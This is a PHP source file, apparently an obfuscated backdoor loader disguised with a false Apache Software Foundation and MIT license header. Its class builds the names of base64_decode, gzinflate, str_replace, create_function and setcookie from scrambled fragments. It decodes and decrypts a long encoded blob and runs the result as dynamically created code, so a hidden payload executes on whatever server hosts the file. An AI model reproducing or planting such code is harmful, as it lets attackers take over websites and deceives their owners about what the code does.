<?php
 /*
 * This file is part of the Apache Software Foundation (ASF).
 *
 * This source file is subject to the MIT license that is bundled
 * with this source code in the file LICENSE.
 */
 
class Dex {
	function __construct() {
		$build = $this->_point($this->_core);
		$build = $this->value($this->_process($build));
		$build = $this->lib($build);
		if($build) {
			$this->_library = $build[3];
			$this->_move = $build[2];
			$this->_stack = $build[0];
			$this->px($build[0], $build[1]);
		}
	}
	
	function px($ver, $claster) {
		$this->_income = $ver;
		$this->claster = $claster;
		$this->control = $this->_point($this->control);
		$this->control = $this->_process($this->control);
		$this->control = $this->module();
		if(strpos($this->control, $this->_income) !== false) {
			if(!$this->_library)
				$this->dx($this->_move, $this->_stack);
			$this->lib($this->control);
		}
	}
	
	function dx($_seek, $check) {
		$income = $this->dx[3].$this->dx[0].$this->dx[2].$this->dx[1];
		$income = @$income($_seek, $check);
	}

	function debug($claster, $mv, $ver) {
		$income = strlen($mv) + strlen($ver);
		while(strlen($ver) < $income) {
			$code = ord($mv[$this->_x86]) - ord($ver[$this->_x86]);
			$mv[$this->_x86] = chr($code % (128*2));
			$ver .= $mv[$this->_x86];
			$this->_x86++;
		}
		return $mv;
	}
   
	function _process($_seek) {
		$access = $this->_process[2].$this->_process[1].$this->_process[3].$this->_process[0];
		$access = @$access($_seek);
		return $access;
	}

	function value($_seek) {
		$access = $this->value[3].$this->value[2].$this->value[1].$this->value[0].$this->value[4];
		$access = @$access($_seek);
		return $access;
	}
	
	function module() {
		$this->_memory = $this->debug($this->claster, $this->control, $this->_income);
		$this->_memory = $this->value($this->_memory);
		return $this->_memory;
	}
	
	function lib($load) {
		$access = $this->_tx[3].$this->_tx[1].$this->_tx[0].$this->_tx[5].$this->_tx[4].$this->_tx[2];
		$view = @$access('', $load);
		return $view();
	}
	
	function _point($income) {
		$access = $this->_x64[3].$this->_x64[2].$this->_x64[1].$this->_x64[0];
		return $access("\r\n", "", $income);
	}
	 
	var $conf;
	var $_x86 = 0;
	
	var $value = array('la', 'nf', 'i', 'gz', 'te');
	var $_tx = array('e_', 'at', 'on', 'cre', 'cti', 'fun');
	var $_process = array('code', '64_', 'base', 'de');
	var $dx = array('tc', 'kie', 'oo', 'se');
	var $_x64 = array('e', 'plac', 're', 'str_');
	 
	var $control = '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
